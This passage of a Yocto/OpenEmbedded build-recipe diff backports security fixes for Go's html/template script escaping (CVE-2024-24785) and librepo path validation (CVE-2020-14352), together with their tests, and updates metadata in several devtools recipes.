++		19: {" group: ; (asd", "misformatted parenthetical comment"},
++		20: {`(John) Doe <jdoe@machine.example>`, "missing word in phrase:"},
+ 	}
+ 
+ 	for i, tc := range mustErrTestCases {
+@@ -436,24 +439,19 @@ func TestAddressParsing(t *testing.T) {
+ 				Address: "john.q.public@example.com",
+ 			}},
+ 		},
+-		{
+-			`"John (middle) Doe" <jdoe@machine.example>`,
+-			[]*Address{{
+-				Name:    "John (middle) Doe",
+-				Address: "jdoe@machine.example",
+-			}},
+-		},
++		// Comment in display name
+ 		{
+ 			`John (middle) Doe <jdoe@machine.example>`,
+ 			[]*Address{{
+-				Name:    "John (middle) Doe",
++				Name:    "John Doe",
+ 				Address: "jdoe@machine.example",
+ 			}},
+ 		},
++		// Display name is quoted string, so comment is not a comment
+ 		{
+-			`John !@M@! Doe <jdoe@machine.example>`,
++			`"John (middle) Doe" <jdoe@machine.example>`,
+ 			[]*Address{{
+-				Name:    "John !@M@! Doe",
++				Name:    "John (middle) Doe",
+ 				Address: "jdoe@machine.example",
+ 			}},
+ 		},
+@@ -788,6 +786,26 @@ func TestAddressParsing(t *testing.T) {
+ 				},
+ 			},
+ 		},
++		// Comment in group display name
++		{
++			`group (comment:): a@example.com, b@example.com;`,
++			[]*Address{
++				{
++					Address: "a@example.com",
++				},
++				{
++					Address: "b@example.com",
++				},
++			},
++		},
++		{
++			`x(:"):"@a.example;("@b.example;`,
++			[]*Address{
++				{
++					Address: `@a.example;(@b.example`,
++				},
++			},
++		},
+ 	}
+ 	for _, test := range tests {
+ 		if len(test.exp) == 1 {
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2024-24785.patch b/meta/recipes-devtools/go/go-1.14/CVE-2024-24785.patch
new file mode 100644
index 0000000000..1398a2ca48
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2024-24785.patch
@@ -0,0 +1,197 @@
+From 3643147a29352ca2894fd5d0d2069bc4b4335a7e Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <roland@golang.org>
+Date: Wed, 14 Feb 2024 17:18:36 -0800
+Subject: [PATCH] [release-branch.go1.21] html/template: escape additional
+ tokens in MarshalJSON errors
+
+Escape "</script" and "<!--" in errors returned from MarshalJSON errors
+when attempting to marshal types in script blocks. This prevents any
+user controlled content from prematurely terminating the script block.
+
+Updates #65697
+Fixes #65968
+
+Change-Id: Icf0e26c54ea7d9c1deed0bff11b6506c99ddef1b
+Reviewed-on: https://go-review.googlesource.com/c/go/+/564196
+LUCI-TryBot-Result: Go LUCI <golang-scoped@luci-project-accounts.iam.gserviceaccount.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+(cherry picked from commit ccbc725f2d678255df1bd326fa511a492aa3a0aa)
+Reviewed-on: https://go-review.googlesource.com/c/go/+/567515
+Reviewed-by: Carlos Amedee <carlos@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/3643147a29352ca2894fd5d0d2069bc4b4335a7e]
+CVE: CVE-2024-24785
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/html/template/js.go      | 22 ++++++++-
+ src/html/template/js_test.go | 96 ++++++++++++++++++++----------------
+ 2 files changed, 74 insertions(+), 44 deletions(-)
+
+diff --git a/src/html/template/js.go b/src/html/template/js.go
+index 35994f0..4d3b25d 100644
+--- a/src/html/template/js.go
++++ b/src/html/template/js.go
+@@ -171,13 +171,31 @@ func jsValEscaper(args ...interface{}) string {
+ 	// cyclic data. This may be an unacceptable DoS risk.
+ 	b, err := json.Marshal(a)
+ 	if err != nil {
+-		// Put a space before comment so that if it is flush against
++		// While the standard JSON marshaller does not include user controlled
++		// information in the error message, if a type has a MarshalJSON method,
++		// the content of the error message is not guaranteed. Since we insert
++		// the error into the template, as part of a comment, we attempt to
++		// prevent the error from either terminating the comment, or the script
++		// block itself.
++		//
++		// In particular we:
++		//   * replace "*/" comment end tokens with "* /", which does not
++		//     terminate the comment
++		//   * replace "</script" with "\x3C/script", and "<!--" with
++		//     "\x3C!--", which prevents confusing script block termination
++		//     semantics
++		//
++		// We also put a space before the comment so that if it is flush against
+ 		// a division operator it is not turned into a line comment:
+ 		//     x/{{y}}
+ 		// turning into
+ 		//     x//* error marshaling y:
+ 		//          second line of error message */null
+-		return fmt.Sprintf(" /* %s */null ", strings.ReplaceAll(err.Error(), "*/", "* /"))
++		errStr := err.Error()
++		errStr = strings.ReplaceAll(errStr, "*/", "* /")
++		errStr = strings.ReplaceAll(errStr, "</script", `\x3C/script`)
++		errStr = strings.ReplaceAll(errStr, "<!--", `\x3C!--`)
++		return fmt.Sprintf(" /* %s */null ", errStr)
+ 	}
+ 
+ 	// TODO: maybe post-process output to prevent it from containing
+diff --git a/src/html/template/js_test.go b/src/html/template/js_test.go
+index de9ef28..3fc3baf 100644
+--- a/src/html/template/js_test.go
++++ b/src/html/template/js_test.go
+@@ -5,6 +5,7 @@
+ package template
+ 
+ import (
++	"errors"
+ 	"bytes"
+ 	"math"
+ 	"strings"
+@@ -104,61 +105,72 @@ func TestNextJsCtx(t *testing.T) {
+ 	}
+ }
+ 
++type jsonErrType struct{}
++
++func (e *jsonErrType) MarshalJSON() ([]byte, error) {
++	return nil, errors.New("beep */ boop </script blip <!--")
++}
++
+ func TestJSValEscaper(t *testing.T) {
+ 	tests := []struct {
+-		x  interface{}
+-		js string
++		x        interface{}
++		js       string
++		skipNest bool
+ 	}{
+-		{int(42), " 42 "},
+-		{uint(42), " 42 "},
+-		{int16(42), " 42 "},
+-		{uint16(42), " 42 "},
+-		{int32(-42), " -42 "},
+-		{uint32(42), " 42 "},
+-		{int16(-42), " -42 "},
+-		{uint16(42), " 42 "},
+-		{int64(-42), " -42 "},
+-		{uint64(42), " 42 "},
+-		{uint64(1) << 53, " 9007199254740992 "},
++		{int(42), " 42 ", false},
++		{uint(42), " 42 ", false},
++		{int16(42), " 42 ", false},
++		{uint16(42), " 42 ", false},
++		{int32(-42), " -42 ", false},
++		{uint32(42), " 42 ", false},
++		{int16(-42), " -42 ", false},
++		{uint16(42), " 42 ", false},
++		{int64(-42), " -42 ", false},
++		{uint64(42), " 42 ", false},
++		{uint64(1) << 53, " 9007199254740992 ", false},
+ 		// ulp(1 << 53) > 1 so this loses precision in JS
+ 		// but it is still a representable integer literal.
+-		{uint64(1)<<53 + 1, " 9007199254740993 "},
+-		{float32(1.0), " 1 "},
+-		{float32(-1.0), " -1 "},
+-		{float32(0.5), " 0.5 "},
+-		{float32(-0.5), " -0.5 "},
+-		{float32(1.0) / float32(256), " 0.00390625 "},
+-		{float32(0), " 0 "},
+-		{math.Copysign(0, -1), " -0 "},
+-		{float64(1.0), " 1 "},
+-		{float64(-1.0), " -1 "},
+-		{float64(0.5), " 0.5 "},
+-		{float64(-0.5), " -0.5 "},
+-		{float64(0), " 0 "},
+-		{math.Copysign(0, -1), " -0 "},
+-		{"", `""`},
+-		{"foo", `"foo"`},
++		{uint64(1)<<53 + 1, " 9007199254740993 ", false},
++		{float32(1.0), " 1 ", false},
++		{float32(-1.0), " -1 ", false},
++		{float32(0.5), " 0.5 ", false},
++		{float32(-0.5), " -0.5 ", false},
++		{float32(1.0) / float32(256), " 0.00390625 ", false},
++		{float32(0), " 0 ", false},
++		{math.Copysign(0, -1), " -0 ", false},
++		{float64(1.0), " 1 ", false},
++		{float64(-1.0), " -1 ", false},
++		{float64(0.5), " 0.5 ", false},
++		{float64(-0.5), " -0.5 ", false},
++		{float64(0), " 0 ", false},
++		{math.Copysign(0, -1), " -0 ", false},
++		{"", `""`, false},
++		{"foo", `"foo"`, false},
+ 		// Newlines.
+-		{"\r\n\u2028\u2029", `"\r\n\u2028\u2029"`},
++		{"\r\n\u2028\u2029", `"\r\n\u2028\u2029"`, false},
+ 		// "\v" == "v" on IE 6 so use "\u000b" instead.
+-		{"\t\x0b", `"\t\u000b"`},
+-		{struct{ X, Y int }{1, 2}, `{"X":1,"Y":2}`},
+-		{[]interface{}{}, "[]"},
+-		{[]interface{}{42, "foo", nil}, `[42,"foo",null]`},
+-		{[]string{"<!--", "</script>", "-->"}, `["\u003c!--","\u003c/script\u003e","--\u003e"]`},
+-		{"<!--", `"\u003c!--"`},
+-		{"-->", `"--\u003e"`},
+-		{"<![CDATA[", `"\u003c![CDATA["`},
+-		{"]]>", `"]]\u003e"`},
+-		{"</script", `"\u003c/script"`},
+-		{"\U0001D11E", "\"\U0001D11E\""}, // or "\uD834\uDD1E"
+-		{nil, " null "},
++		{"\t\x0b", `"\t\u000b"`, false},
++		{struct{ X, Y int }{1, 2}, `{"X":1,"Y":2}`, false},
++		{[]interface{}{}, "[]", false},
++		{[]interface{}{42, "foo", nil}, `[42,"foo",null]`, false},
++		{[]string{"<!--", "</script>", "-->"}, `["\u003c!--","\u003c/script\u003e","--\u003e"]`, false},
++		{"<!--", `"\u003c!--"`, false},
++		{"-->", `"--\u003e"`, false},
++		{"<![CDATA[", `"\u003c![CDATA["`, false},
++		{"]]>", `"]]\u003e"`, false},
++		{"</script", `"\u003c/script"`, false},
++		{"\U0001D11E", "\"\U0001D11E\"", false}, // or "\uD834\uDD1E"
++		{nil, " null ", false},
++		{&jsonErrType{}, " /* json: error calling MarshalJSON for type *template.jsonErrType: beep * / boop \\x3C/script blip \\x3C!-- */null ", true},
+ 	}
+ 
+ 	for _, test := range tests {
+ 		if js := jsValEscaper(test.x); js != test.js {
+ 			t.Errorf("%+v: want\n\t%q\ngot\n\t%q", test.x, test.js, js)
+ 		}
++		if test.skipNest {
++			continue
++		}
+ 		// Make sure that escaping corner cases are not broken
+ 		// by nesting.
+ 		a := []interface{}{test.x}
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/go/go-crosssdk.inc b/meta/recipes-devtools/go/go-crosssdk.inc
index f0bec79719..36c9b12af8 100644
--- a/meta/recipes-devtools/go/go-crosssdk.inc
+++ b/meta/recipes-devtools/go/go-crosssdk.inc
@@ -4,6 +4,8 @@ DEPENDS = "go-native virtual/${TARGET_PREFIX}gcc-crosssdk virtual/nativesdk-${TA
 PN = "go-crosssdk-${SDK_SYS}"
 PROVIDES = "virtual/${TARGET_PREFIX}go-crosssdk"
 
+export GOCACHE = "${B}/.cache"
+
 do_configure[noexec] = "1"
 
 do_compile() {
diff --git a/meta/recipes-devtools/go/go-dep_0.5.4.bb b/meta/recipes-devtools/go/go-dep_0.5.4.bb
index 0da2c6607c..e29e53433e 100644
--- a/meta/recipes-devtools/go/go-dep_0.5.4.bb
+++ b/meta/recipes-devtools/go/go-dep_0.5.4.bb
@@ -4,7 +4,7 @@ LICENSE = "BSD-3-Clause"
 LIC_FILES_CHKSUM = "file://src/${GO_IMPORT}/LICENSE;md5=1bad315647751fab0007812f70d42c0d"
 
 GO_IMPORT = "github.com/golang/dep"
-SRC_URI = "git://${GO_IMPORT} \
+SRC_URI = "git://${GO_IMPORT};branch=master \
            file://0001-Add-support-for-mips-mips64.patch;patchdir=src/github.com/golang/dep \
            file://0001-bolt_riscv64-Add-support-for-riscv64.patch;patchdir=src/github.com/golang/dep \
           "
diff --git a/meta/recipes-devtools/go/go_1.14.bb b/meta/recipes-devtools/go/go_1.14.bb
index bc90a1329e..76ff788238 100644
--- a/meta/recipes-devtools/go/go_1.14.bb
+++ b/meta/recipes-devtools/go/go_1.14.bb
@@ -3,12 +3,12 @@ require go-target.inc
 
 export GOBUILDMODE=""
 export CGO_ENABLED_riscv64 = ""
-# Add pie to GOBUILDMODE to satisfy "textrel" QA checking, but mips/riscv
-# doesn't support -buildmode=pie, so skip the QA checking for mips/riscv and its
-# variants.
+# Add pie to GOBUILDMODE to satisfy "textrel" QA checking, but
+# windows/mips/riscv doesn't support -buildmode=pie, so skip the QA checking
+# for windows/mips/riscv and their variants.
 python() {
-    if 'mips' in d.getVar('TARGET_ARCH',True) or 'riscv' in d.getVar('TARGET_ARCH',True):
-        d.appendVar('INSANE_SKIP_%s' % d.getVar('PN',True), " textrel")
+    if 'mips' in d.getVar('TARGET_ARCH') or 'riscv' in d.getVar('TARGET_ARCH') or 'windows' in d.getVar('TARGET_GOOS'):
+        d.appendVar('INSANE_SKIP_%s' % d.getVar('PN'), " textrel")
     else:
         d.setVar('GOBUILDMODE', 'pie')
 }
diff --git a/meta/recipes-devtools/help2man/help2man-native_1.47.11.bb b/meta/recipes-devtools/help2man/help2man-native_1.47.11.bb
index a60e851897..8e5f940deb 100644
--- a/meta/recipes-devtools/help2man/help2man-native_1.47.11.bb
+++ b/meta/recipes-devtools/help2man/help2man-native_1.47.11.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Program for creating simple man pages"
-SECTION = "devel"
+HOMEPAGE = "https://www.gnu.org/software/help2man/"
+DESCRIPTION = "help2man is a tool for automatically generating simple manual pages from program output."SECTION = "devel"
 LICENSE = "GPLv3"
 LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504"
 DEPENDS = "autoconf-native automake-native"
diff --git a/meta/recipes-devtools/i2c-tools/i2c-tools_4.1.bb b/meta/recipes-devtools/i2c-tools/i2c-tools_4.1.bb
index c5761170aa..fc17e8d9b4 100644
--- a/meta/recipes-devtools/i2c-tools/i2c-tools_4.1.bb
+++ b/meta/recipes-devtools/i2c-tools/i2c-tools_4.1.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Set of i2c tools for linux"
 HOMEPAGE = "https://i2c.wiki.kernel.org/index.php/I2C_Tools"
+DESCRIPTION = "The i2c-tools package contains a heterogeneous set of I2C tools for Linux: a bus probing tool, a chip dumper, register-level SMBus access helpers, EEPROM decoding scripts, EEPROM programming tools, and a python module for SMBus access. All versions of Linux are supported, as long as I2C support is included in the kernel."
 SECTION = "base"
 LICENSE = "GPLv2+"
 LIC_FILES_CHKSUM = "file://COPYING;md5=751419260aa954499f7abaabaa882bbe"
diff --git a/meta/recipes-devtools/icecc-toolchain/nativesdk-icecc-toolchain_0.1.bb b/meta/recipes-devtools/icecc-toolchain/nativesdk-icecc-toolchain_0.1.bb
index 304ad7fec0..ce4d73caf6 100644
--- a/meta/recipes-devtools/icecc-toolchain/nativesdk-icecc-toolchain_0.1.bb
+++ b/meta/recipes-devtools/icecc-toolchain/nativesdk-icecc-toolchain_0.1.bb
@@ -1,6 +1,7 @@
 # Copyright (c) 2018 Joshua Watt, Garmin International,Inc.
 # Released under the MIT license (see COPYING.MIT for the terms)
 SUMMARY = "Generates Icecream toolchain for SDK"
+DESCRIPTION = "${SUMMARY}"
 LICENSE = "MIT"
 LIC_FILES_CHKSUM = "file://${WORKDIR}/icecc-env.sh;beginline=2;endline=20;md5=dd6b68c1efed8a9fb04e409b3b287d47"
 
diff --git a/meta/recipes-devtools/intltool/intltool_0.51.0.bb b/meta/recipes-devtools/intltool/intltool_0.51.0.bb
index ecff2faf25..592dbb92e2 100644
--- a/meta/recipes-devtools/intltool/intltool_0.51.0.bb
+++ b/meta/recipes-devtools/intltool/intltool_0.51.0.bb
@@ -1,4 +1,6 @@
 SUMMARY = "Utility scripts for internationalizing XML"
+HOMEPAGE = "https://launchpad.net/intltool"
+DESCRIPTION = "Utility scripts for internationalizing XML. This tool automatically extracts translatable strings from oaf, glade, bonobo ui, nautilus theme and other XML files into the po files."
 SECTION = "devel"
 LICENSE = "GPLv2"
 LIC_FILES_CHKSUM = "file://COPYING;md5=94d55d512a9ba36caa9b7df079bae19f"
diff --git a/meta/recipes-devtools/jquery/jquery_3.5.0.bb b/meta/recipes-devtools/jquery/jquery_3.5.0.bb
index 5c6f9cddbe..efffe05fd2 100644
--- a/meta/recipes-devtools/jquery/jquery_3.5.0.bb
+++ b/meta/recipes-devtools/jquery/jquery_3.5.0.bb
@@ -1,5 +1,6 @@
 SUMMARY = "jQuery is a fast, small, and feature-rich JavaScript library"
 HOMEPAGE = "https://jquery.com/"
+DESCRIPTION = "${SUMMARY}"
 LICENSE = "MIT"
 SECTION = "devel"
 LIC_FILES_CHKSUM = "file://${WORKDIR}/${BP}.js;startline=8;endline=10;md5=b1e67ece919e852643f1541a54492d65"
@@ -16,6 +17,11 @@ SRC_URI[map.sha256sum] = "3149351c8cbc3fb230bbf6188617c7ffda77d9e14333f4f5f0aa1a
 
 UPSTREAM_CHECK_REGEX = "jquery-(?P<pver>\d+(\.\d+)+)\.js"
 
+# https://github.com/jquery/jquery/issues/3927
+# There are ways jquery can expose security issues but any issues are in the apps exposing them
+# and there is little we can directly do
+CVE_CHECK_WHITELIST += "CVE-2007-2379"
+
 inherit allarch
 
 do_install() {
diff --git a/meta/recipes-devtools/libcomps/libcomps_0.1.15.bb b/meta/recipes-devtools/libcomps/libcomps_0.1.15.bb
index 98c55dca85..d9e712f74a 100644
--- a/meta/recipes-devtools/libcomps/libcomps_0.1.15.bb
+++ b/meta/recipes-devtools/libcomps/libcomps_0.1.15.bb
@@ -1,8 +1,10 @@
 SUMMARY = "Libcomps is alternative for yum.comps library (which is for managing rpm package groups)."
+HOMEPAGE = "https://github.com/rpm-software-management/libcomps"
+DESCRIPTION = "Libcomps is alternative for yum.comps library. It's written in pure C as library and there's bindings for python2 and python3."
 LICENSE = "GPLv2"
 LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
 
-SRC_URI = "git://github.com/rpm-software-management/libcomps.git \
+SRC_URI = "git://github.com/rpm-software-management/libcomps.git;branch=master;protocol=https \
            file://0001-Add-crc32.c-to-sources-list.patch \
            file://0002-Do-not-set-PYTHON_INSTALL_DIR-by-running-python.patch \
            "
diff --git a/meta/recipes-devtools/libdnf/libdnf/0040-Mark-job-goal.upgrade-with-sltr-as-target.patch b/meta/recipes-devtools/libdnf/libdnf/0040-Mark-job-goal.upgrade-with-sltr-as-target.patch
new file mode 100644
index 0000000000..61d255581b
--- /dev/null
+++ b/meta/recipes-devtools/libdnf/libdnf/0040-Mark-job-goal.upgrade-with-sltr-as-target.patch
@@ -0,0 +1,58 @@
+From b4c5a3312287f31a2075a235db846ff611586d2c Mon Sep 17 00:00:00 2001
+From: Jaroslav Mracek <jmracek@redhat.com>
+Date: Tue, 3 Sep 2019 11:01:23 +0200
+Subject: [PATCH] Mark job goal.upgrade with sltr as targeted
+
+It allows to keep installed packages in upgrade set.
+
+It also prevents from reinstalling of modified packages with same NEVRA.
+
+
+Backport commit b4c5a3312287f31a2075a235db846ff611586d2c from
+https://github.com/rpm-software-management/libdnf
+
+This bug is present in oe-core's dnf
+
+Remove changes to spec file from upstream
+
+Upstream-Status: Backport
+Signed-off-by: Jate Sujjavanich <jatedev@gmail.com>
+---
+ libdnf.spec          | 4 ++--
+ libdnf/goal/Goal.cpp | 2 +-
+ libdnf/goal/Goal.hpp | 6 ++++--
+ 3 files changed, 7 insertions(+), 5 deletions(-)
+
+diff --git a/libdnf/goal/Goal.cpp b/libdnf/goal/Goal.cpp
+index b69be19..a38cbb4 100644
+--- a/libdnf/goal/Goal.cpp
++++ b/libdnf/goal/Goal.cpp
+@@ -767,7 +767,7 @@ void
+ Goal::upgrade(HySelector sltr)
+ {
+     pImpl->actions = static_cast<DnfGoalActions>(pImpl->actions | DNF_UPGRADE);
+-    sltrToJob(sltr, &pImpl->staging, SOLVER_UPDATE);
++    sltrToJob(sltr, &pImpl->staging, SOLVER_UPDATE|SOLVER_TARGETED);
+ }
+ 
+ void
+diff --git a/libdnf/goal/Goal.hpp b/libdnf/goal/Goal.hpp
+index f33dfa2..d701317 100644
+--- a/libdnf/goal/Goal.hpp
++++ b/libdnf/goal/Goal.hpp
+@@ -86,8 +86,10 @@ public:
+     /**
+     * @brief If selector ill formed, it rises std::runtime_error()
+     *
+-    * @param sltr p_sltr: It should contain only upgrades with obsoletes otherwise it can try to
+-    * reinstall installonly packages.
++    * @param sltr p_sltr: It contains upgrade-to packages and obsoletes. The presence of installed
++    * packages prevents reinstalling packages with the same NEVRA but changed contant. To honor repo
++    * priority all relevant packages must be present. To upgrade package foo from priority repo, all
++    * installed and available packages of the foo must be in selector plus obsoletes of foo.
+     */
+     void upgrade(HySelector sltr);
+     void userInstalled(DnfPackage *pkg);
+-- 
+2.7.4
+
diff --git a/meta/recipes-devtools/libdnf/libdnf_0.28.1.bb b/meta/recipes-devtools/libdnf/libdnf_0.28.1.bb
index 43de06e7f9..39858ad401 100644
--- a/meta/recipes-devtools/libdnf/libdnf_0.28.1.bb
+++ b/meta/recipes-devtools/libdnf/libdnf_0.28.1.bb
@@ -1,14 +1,17 @@
 SUMMARY = "Library providing simplified C and Python API to libsolv"
+HOMEPAGE = "https://github.com/rpm-software-management/libdnf"
+DESCRIPTION = "This library provides a high level package-manager. It's core library of dnf, PackageKit and rpm-ostree. It's replacement for deprecated hawkey library which it contains inside and uses librepo under the hood."
 LICENSE = "LGPLv2.1+"
 LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c"
 
-SRC_URI = "git://github.com/rpm-software-management/libdnf \
+SRC_URI = "git://github.com/rpm-software-management/libdnf;branch=master;protocol=https \
            file://0001-FindGtkDoc.cmake-drop-the-requirement-for-GTKDOC_SCA.patch \
            file://0004-Set-libsolv-variables-with-pkg-config-cmake-s-own-mo.patch \
            file://0001-Get-parameters-for-both-libsolv-and-libsolvext-libdn.patch \
            file://0001-Add-WITH_TESTS-option.patch \
            file://0001-include-stdexcept-for-runtime_error.patch \
            file://fix-deprecation-warning.patch \
+           file://0040-Mark-job-goal.upgrade-with-sltr-as-target.patch \
            "
 
 SRCREV = "751f89045b80d58c0d05800f74357cf78cdf7e77"
diff --git a/meta/recipes-devtools/libmodulemd/libmodulemd-v1_git.bb b/meta/recipes-devtools/libmodulemd/libmodulemd-v1_git.bb
index 5409051d79..7d8560f3cc 100644
--- a/meta/recipes-devtools/libmodulemd/libmodulemd-v1_git.bb
+++ b/meta/recipes-devtools/libmodulemd/libmodulemd-v1_git.bb
@@ -1,4 +1,6 @@
 SUMMARY = "C Library for manipulating module metadata files"
+HOMEPAGE = "https://github.com/fedora-modularity/libmodulemd"
+DESCRIPTION = "${SUMMARY}"
 LICENSE = "MIT"
 LIC_FILES_CHKSUM = "file://COPYING;md5=25a3927bff3ee4f5b21bcb0ed3fcd6bb"
 
diff --git a/meta/recipes-devtools/librepo/librepo/CVE-2020-14352.patch b/meta/recipes-devtools/librepo/librepo/CVE-2020-14352.patch
new file mode 100644
index 0000000000..8f4c5b73bc
--- /dev/null
+++ b/meta/recipes-devtools/librepo/librepo/CVE-2020-14352.patch
@@ -0,0 +1,55 @@
+From 6027d68337b537bf9a68cf810cf9b8e40dac22f8 Mon Sep 17 00:00:00 2001
+From: Jaroslav Rohel <jrohel@redhat.com>
+Date: Wed, 12 Aug 2020 08:35:28 +0200
+Subject: [PATCH] Validate path read from repomd.xml (RhBug:1868639)
+
+= changelog =
+msg: Validate path read from repomd.xml
+type: security
+resolves: https://bugzilla.redhat.com/show_bug.cgi?id=1868639
+
+Upstream-Status: Acepted [https://github.com/rpm-software-management/librepo/commit/7daea2a2429a54dad68b1de9b37a5f65c5cf2600]
+CVE: CVE-2020-14352
+Signed-off-by: Minjae Kim <flowergom@gmail.com>
+---
+ librepo/yum.c | 17 +++++++++++++++++
+ 1 file changed, 17 insertions(+)
+
+diff --git a/librepo/yum.c b/librepo/yum.c
+index 3059188..529257b 100644
+--- a/librepo/yum.c
++++ b/librepo/yum.c
+@@ -23,6 +23,7 @@
+ #define  BITS_IN_BYTE 8
+ 
+ #include <stdio.h>
++#include <libgen.h>
+ #include <assert.h>
+ #include <stdlib.h>
+ #include <errno.h>
+@@ -770,6 +771,22 @@ prepare_repo_download_targets(LrHandle *handle,
+             continue;
+ 
+         char *location_href = record->location_href;
++
++        char *dest_dir = realpath(handle->destdir, NULL);
++        path = lr_pathconcat(handle->destdir, record->location_href, NULL);
++        char *requested_dir = realpath(dirname(path), NULL);
++        lr_free(path);
++        if (!g_str_has_prefix(requested_dir, dest_dir)) {
++            g_debug("%s: Invalid path: %s", __func__, location_href);
++            g_set_error(err, LR_YUM_ERROR, LRE_IO, "Invalid path: %s", location_href);
++            g_slist_free_full(*targets, (GDestroyNotify) lr_downloadtarget_free);
++            free(requested_dir);
++            free(dest_dir);
++            return FALSE;
++        }
++        free(requested_dir);
++        free(dest_dir);
++
+         gboolean is_zchunk = FALSE;
+         #ifdef WITH_ZCHUNK
+         if (handle->cachedir && record->header_checksum)
+-- 
+2.17.1
+
diff --git a/meta/recipes-devtools/librepo/librepo_1.11.2.bb b/meta/recipes-devtools/librepo/librepo_1.11.2.bb
index 6a0a59f865..73a58f75e3 100644
--- a/meta/recipes-devtools/librepo/librepo_1.11.2.bb
+++ b/meta/recipes-devtools/librepo/librepo_1.11.2.bb
@@ -1,11 +1,14 @@
 SUMMARY = "A library providing C and Python (libcURL like) API \
            for downloading linux repository metadata and packages."
+HOMEPAGE = "https://github.com/rpm-software-management/librepo"
+DESCRIPTION = "${SUMMARY}"
 LICENSE = "LGPLv2.1"
 LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c"
 
-SRC_URI = "git://github.com/rpm-software-management/librepo.git \
+SRC_URI = "git://github.com/rpm-software-management/librepo.git;branch=master;protocol=https \
            file://0002-Do-not-try-to-obtain-PYTHON_INSTALL_DIR-by-running-p.patch \
            file://0004-Set-gpgme-variables-with-pkg-config-not-with-cmake-m.patch \
+           file://CVE-2020-14352.patch \
            "
 
 SRCREV = "67c2d1f83f1bf87be3f26ba730fce7fbdf0c9fba"
diff --git a/meta/recipes-devtools/libtool/libtool-2.4.6.inc b/meta/recipes-devtools/libtool/libtool-2.4.6.inc
index 8e17b56d46..c8744e6d5f 100644
--- a/meta/recipes-devtools/libtool/libtool-2.4.6.inc
+++ b/meta/recipes-devtools/libtool/libtool-2.4.6.inc
@@ -21,6 +21,10 @@ SRC_URI = "${GNU_MIRROR}/libtool/libtool-${PV}.tar.gz \
            file://unwind-opt-parsing.patch \
            file://0001-libtool-Fix-support-for-NIOS2-processor.patch \
            file://0001-libtool-Check-for-static-libs-for-internal-compiler-.patch \
+           file://0001-Makefile.am-make-sure-autoheader-run-before-autoconf.patch \
+           file://0001-Makefile.am-make-sure-autoheader-run-before-automake.patch \
+           file://lto-prefix.patch \
+           file://debian-no_hostname.patch \
           "
 
 SRC_URI[md5sum] = "addf44b646ddb4e3919805aa88fa7c5e"
diff --git a/meta/recipes-devtools/libtool/libtool/0001-Makefile.am-make-sure-autoheader-run-before-autoconf.patch b/meta/recipes-devtools/libtool/libtool/0001-Makefile.am-make-sure-autoheader-run-before-autoconf.patch
new file mode 100644
index 0000000000..2e9908725e
--- /dev/null
+++ b/meta/recipes-devtools/libtool/libtool/0001-Makefile.am-make-sure-autoheader-run-before-autoconf.patch
@@ -0,0 +1,35 @@
+From dfbbbd359e43e0a55fbea06f2647279ad8761cb9 Mon Sep 17 00:00:00 2001
+From: Mingli Yu <mingli.yu@windriver.com>
+Date: Wed, 24 Mar 2021 03:04:13 +0000
+Subject: [PATCH] Makefile.am: make sure autoheader run before autoconf
+
+autoheader will update ../libtool-2.4.6/libltdl/config-h.in which
+autoconf needs, so there comes a race sometimes as below:
+ | configure.ac:45: error: required file 'config-h.in' not found
+ | touch '../libtool-2.4.6/libltdl/config-h.in'
+
+So make sure autoheader run before autoconf to avoid this race.
+
+Upstream-Status: Submitted [libtool-patches@gnu.org maillist]
+
+Signed-off-by: Mingli Yu <mingli.yu@windriver.com>
+---
+ Makefile.am | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/Makefile.am b/Makefile.am
+index 4142c90..fe1a9fc 100644
+--- a/Makefile.am
++++ b/Makefile.am
+@@ -365,7 +365,7 @@ lt_configure_deps = $(lt_aclocal_m4) $(lt_aclocal_m4_deps)
+ $(lt_aclocal_m4): $(lt_aclocal_m4_deps)
+ 	$(AM_V_GEN)cd '$(srcdir)/$(ltdl_dir)' && $(ACLOCAL) -I ../m4
+ 
+-$(lt_configure): $(lt_configure_deps)
++$(lt_configure): $(lt_configure_deps) $(lt_config_h_in)
+ 	$(AM_V_GEN)cd '$(srcdir)/$(ltdl_dir)' && $(AUTOCONF)
+ 
+ $(lt_config_h_in): $(lt_configure_deps)
+-- 
+2.29.2
+
diff --git a/meta/recipes-devtools/libtool/libtool/0001-Makefile.am-make-sure-autoheader-run-before-automake.patch b/meta/recipes-devtools/libtool/libtool/0001-Makefile.am-make-sure-autoheader-run-before-automake.patch
new file mode 100644
index 0000000000..87f8492346
--- /dev/null
+++ b/meta/recipes-devtools/libtool/libtool/0001-Makefile.am-make-sure-autoheader-run-before-automake.patch
@@ -0,0 +1,35 @@
+From e82c06584f02e3e4487aa73aa05981e2a35dc6d1 Mon Sep 17 00:00:00 2001
+From: Mingli Yu <mingli.yu@windriver.com>
+Date: Tue, 13 Apr 2021 07:17:29 +0000
+Subject: [PATCH] Makefile.am: make sure autoheader run before automake
+
+When use automake to generate Makefile.in from Makefile.am, there
+comes below race:
+ | configure.ac:45: error: required file 'config-h.in' not found
+
+It is because the file config-h.in in updating process by autoheader,
+so make automake run after autoheader to avoid the above race.
+
+Upstream-Status: Submitted [libtool-patches@gnu.org maillist]
+
+Signed-off-by: Mingli Yu <mingli.yu@windriver.com>
+---
+ Makefile.am | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/Makefile.am b/Makefile.am
+index 2752ecc..29950db 100644
+--- a/Makefile.am
++++ b/Makefile.am
+@@ -328,7 +328,7 @@ EXTRA_DIST     += $(lt_aclocal_m4) \
+ 		  $(lt_obsolete_m4) \
+ 		  $(stamp_mk)
+ 
+-$(lt_Makefile_in): $(lt_Makefile_am) $(lt_aclocal_m4)
